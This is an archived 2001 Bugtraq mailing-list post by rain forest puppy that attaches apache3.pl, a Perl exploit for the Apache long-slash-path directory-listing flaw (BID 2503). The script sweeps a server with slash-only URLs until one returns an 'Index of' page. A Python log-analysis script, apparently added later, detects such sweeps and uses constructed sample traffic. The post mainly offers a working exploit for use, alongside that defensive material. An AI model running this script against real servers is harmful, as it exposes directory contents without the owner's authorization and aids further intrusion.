6683066 2001-06-28 18:06 -0500  /32 lines/ rain forest puppy <rfp@wiretrip.net>
Sent by: joel@lysator.liu.se
Imported: 2001-06-29  09:19  by Brevbäraren (the mail importer)
External recipient: bugtraq@securityfocus.com
External CC recipient: kmx@egatobas.org
External CC recipient: siberian@sentry-labs.com
Recipient: Bugtraq (import) <17687>
Subject: Re: Fw: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
------------------------------------------------------------

Well, I might as well have my hand in recoding this exploit. ;)

Attached is apache3.pl, which is a recoded version of Siberian's
recode of Matt Watchinski's exploit.  My version uses libwhisker,
which allows the exploit to have HTTP/1.1, proxy, and SSL support
automatically.  Basic support (not including SSL) should work for any
platform having Perl.

To use the attached exploit, you'll need a copy of libwhisker.  The
latest is pr3, downloadable at:
http://www.wiretrip.net/rfp/p/doc.asp?id=21&iface=7

You can either grab the developer tarball and build/install it, or
just grab the libwhisker.pm, put it in the same directory as the
apache3.pl, and just run apache3.pl--perl will use the libwhisker.pm
module in the same directory.

For SSL support, you'll need either Crypt::SSLeay or Net::SSLeay
installed (which may require OpenSSL).  I think ActiveState has
ported Crypt::SSLeay/Net::SSL (not Net::SSLeay) over to Windows, so
Windows users should have SSL support as well.

If anyone is interested in libwhisker and further using it, consider
joining the whisker-devel mailing list at:
http://sourceforge.net/projects/whisker/

And as always, feedback is always welcome.  See everyone at
BlackHat/DefCon!

- rfp
(6683066) /rain forest puppy <rfp@wiretrip.net>/(Reflowed)
Attachment (text/plain) in text 6683067
6683067 2001-06-28 18:06 -0500  /90 lines/ rain forest puppy <rfp@wiretrip.net>
Attachment filename: "apache3.pl"
Imported: 2001-06-29  09:19  by Brevbäraren (the mail importer)
External recipient: bugtraq@securityfocus.com
External CC recipient: kmx@egatobas.org
External CC recipient: siberian@sentry-labs.com
Recipient: Bugtraq (import) <17688>
Attachment (text/plain) to text 6683066
Subject: Attachment (apache3.pl) to: Re: Fw: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
------------------------------------------------------------
#!/usr/bin/perl
#
# original by farm9, Inc. (copyright 2001)
# then modified by Siberian (www.sentry-labs.com)
# with more modifications by rfp (www.wiretrip.net/rfp/)
#
##########################################################################

use libwhisker;
use Getopt::Std;

# apache3.pl
# this exploit was modified to use the libwhisker library, which gives
# HTTP/1.1, proxy, and SSL support.  Plus, small other changes.

$|++;
my (%hin,%hout,%args);

print "Apache Artificially Long Slash Path Directory Listing Exploit\n";
print "SecurityFocus BID 2503\n\n";
print "Original exploit code written by Matt Watchinski (www.farm9.com)\n";
print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n";
print "Moved to libwhisker by rfp\n\n";

getopts("p:L:H:sP:R:h:",\%args);

if($args{h} eq ''){
	print 'Usage: ./apache3.pl <options>, where options:',"\n";
	print '-h host  host to scan (must be specified)',"\n";
	print '-p ##    host port (default: 80)',"\n";
	print '-L ##    low end/start of range (default: 1)',"\n";
	print '-H ##    high end/end of range (default: 8192)',"\n";
	print '-P host  HTTP proxy via host',"\n";
	print '-R ##    HTTP proxy port (default: 80)',"\n";
	print '-s       use SSL (can\'t be used with proxy)',"\n";
	exit 0;
}

$low =  $args{L} || 1;
$high = $args{H} || 8192;

&lw::http_init_request(\%hin);		# setup our request hash

$hin{'whisker'}->{'host'}= $args{h};
$hin{'whisker'}->{'port'}= $args{p} || 80;

if(defined $args{s}){
	$hin{'whisker'}->{'ssl'} = 1;

	if(defined $args{P}){
		print "SSL not currently compatible with proxy\n";
		exit 1;
	}
}

if(defined $args{'P'}){
	$hin{'whisker'}->{'proxy_host'}=$args{P};
	$hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
	print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
	print "port $hin{'whisker'}->{'proxy_port'}\n";
}

&lw::http_fixup_request(\%hin);		# fix any HTTP requirements

# walk the range, requesting a URI that is nothing but $c slashes;
# a 200 whose body looks like an autoindex page means the server
# returned a directory listing for that slash count
for($c=$low; $c<=$high; $c++){

	$hin{'whisker'}->{'uri'} = '/' x $c;

	if(&lw::http_do_request(\%hin,\%hout)){
		print "Error: $hout{'whisker'}->{'error'}\n";
		exit 1;
	} else {
		if($hout{'whisker'}->{'http_resp'} == 200 &&
			$hout{'whisker'}->{'data'}=~/index of/i){

			print "Found result using $c slashes.\n";
			exit 0;
		}
	}

	print "."; # for status
}

print "\nNot vulnerable (perhaps try a different range).\n";
(6683067) /rain forest puppy <rfp@wiretrip.net>/(Reflowed)
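As an added example (not part of rfp's mail and not code from apache3.pl or libwhisker), the same probe seen from the server side: a Python script that reads Apache access-log lines, picks out requests whose path is nothing but slashes, which is exactly what apache3.pl sends for every count in its -L..-H range, and reports per source host how far the sweep got and whether any slash-only path was answered with a 200 (the point at which the exploit prints "Found result using N slashes" and stops). The log lines, the host addresses and the 8-slash threshold are constructed for the example; the body of the response is not in an access log, so the exploit's "Index of" check cannot be repeated here.

```python
import re

# Apache "common"/"combined" log line; only host, request line and status are
# used below.  Referer and user-agent fields, if present, are ignored.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def slash_run(path):
    """Length of the run of '/' characters at the start of the path."""
    n = 0
    for ch in path:
        if ch != "/":
            break
        n += 1
    return n


def find_probes(log_text, min_slashes=8):
    """Requests whose path is only slashes, at least min_slashes of them.

    apache3.pl requests '/' x $c for each $c in its range, so its traffic is
    exactly this shape.  min_slashes is a constructed threshold: a doubled
    slash ("//cgi-bin/") occurs in ordinary traffic, a path that is nothing
    but eight or more slashes does not.  Returns (host, count, status) tuples
    in log order.
    """
    probes = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        n = slash_run(path)
        if n >= min_slashes and n == len(path):
            probes.append((rec["host"], n, rec["status"]))
    return probes


def summarize(probes):
    """Per host: number of probes, the longest one, and the first count that
    drew a 200 (None if the sweep never got a 200)."""
    summary = {}
    for host, n, status in probes:
        s = summary.setdefault(host, {"requests": 0, "max_slashes": 0, "listing_at": None})
        s["requests"] += 1
        s["max_slashes"] = max(s["max_slashes"], n)
        if status == 200 and s["listing_at"] is None:
            s["listing_at"] = n
    return summary


def constructed_sweep(host, low, high, hit):
    """Constructed log lines imitating one apache3.pl run: one request per
    slash count from low upward, 404 until the count 'hit', where the server
    answers 200 and the exploit exits.  Not real traffic."""
    lines = []
    for n in range(low, high + 1):
        status = 200 if n == hit else 404
        lines.append('%s - - [28/Jun/2001:18:06:%02d -0500] "GET %s HTTP/1.1" %d 1024'
                     % (host, n % 60, "/" * n, status))
        if n == hit:
            break
    return "\n".join(lines) + "\n"


# Constructed sample log (not real traffic): ordinary requests, a harmless
# doubled slash, and one 34-slash request that was answered with a 200.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [28/Jun/2001:18:06:01 -0500] "GET /index.html HTTP/1.1" 200 1532',
    '10.0.0.5 - - [28/Jun/2001:18:06:02 -0500] "GET //cgi-bin/ HTTP/1.1" 404 210',
    '10.0.0.9 - - [28/Jun/2001:18:06:03 -0500] "GET %s HTTP/1.1" 200 4821' % ("/" * 34),
    '10.0.0.9 - - [28/Jun/2001:18:06:04 -0500] "GET /icons/blank.gif HTTP/1.1" 200 148',
]) + "\n"


if __name__ == "__main__":
    log = SAMPLE_LOG + constructed_sweep("10.0.0.7", 1, 8192, 37)
    for host, info in sorted(summarize(find_probes(log)).items()):
        print(host, info)
```

Run it with `python3 slashprobe.py` (any file name will do) to see the two constructed hosts summarized; to use it on a real log, pass the file's contents to find_probes(). The sequential pattern that summarize() exposes, one request per slash count from the same source, is what distinguishes an apache3.pl sweep from a single odd URL.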